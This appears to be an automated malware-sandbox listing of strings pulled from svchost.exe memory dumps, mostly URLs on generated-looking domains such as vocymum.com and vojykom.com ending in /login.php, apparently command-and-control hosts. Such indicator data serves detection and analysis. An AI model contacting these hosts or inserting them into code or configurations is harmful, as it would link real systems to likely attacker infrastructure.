Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799131678.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267123963.0000000003347000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393602354.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2802098474.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vocymum.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2768400966.0000000008705000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vocypyt.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337099007.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336690325.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vocyquc.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328637085.0000000008762000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2581725706.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vocyrom.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337099007.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329628428.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330446877.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vocyzek.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2593211279.00000000087FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vofybic.com/login.php
Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2198551088.0000000008716000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344516796.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298703099.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388123270.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vofybyf.com/login.php
Source: svchost.exe, 00000002.00000003.2671356551.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2639583106.0000000008690000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vofycyk.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192707198.00000000033C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vofydac.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329748670.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329845056.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vofygaf.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vofykoc.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359453590.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vofykyt.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156423614.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396823285.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396706488.00000000086F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397272204.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395827509.00000000086EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2167507417.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267140420.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vofymik.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vofyqit.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665740291.00000000087FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671484952.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vofyzof.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298813609.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vofyzym.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384383810.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojybef.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272828863.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513891995.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2501199142.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272537462.00000000086FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264150395.00000000086FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272290978.00000000086FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2267838094.0000000003391000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2283080934.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2508227965.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2273007343.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojybek.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojycec.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojycif.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2391261344.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267123963.0000000003347000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384383810.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojydoc.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272090324.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojygut.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329748670.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojyjyc.com/login.php
Source: svchost.exe, 00000002.00000003.2321460609.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320047859.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321538396.0000000003393000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojykom.com/
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2768400966.0000000008705000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojykom.com/login.php
